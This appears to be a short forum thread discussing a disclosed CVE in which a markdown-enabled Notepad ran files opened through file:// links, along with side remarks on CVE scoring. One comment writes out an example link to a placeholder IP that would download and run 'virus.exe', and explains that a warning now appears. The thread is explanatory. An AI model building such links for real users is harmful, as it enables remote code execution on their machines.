Yep it’s markdown, and yep they had a CVE with the second-highest grade ’cause of it
Aren’t CVE grades meaningless anyway with how they are declared in real world?
We run CVEs through our software inventory and configuration and come up with a new score that measures how bad it is for us.
https://www.cve.org/CVERecord?id=CVE-2026-20841
Neat
heh, ofc. Apparently something to do with file:// and such URI handling, apparently executing local files? Yikes.
not just local files
if you click a link to file:///123.45.67.89:69420/files-download/virus.exe it will download and run virus.exe from that IP address
it still works, but now there is a “Dangerous Link Location: This is not a web link and may lead to the execution of malicious code” warning, but previously it would silently run the file.
kinda wild a file-link ever went straight to executing it after download - which on its own could be dangerous as well.
I guess the “the s in IoT stands for security” also applies to notepad: “the s in vibecoding stands for security”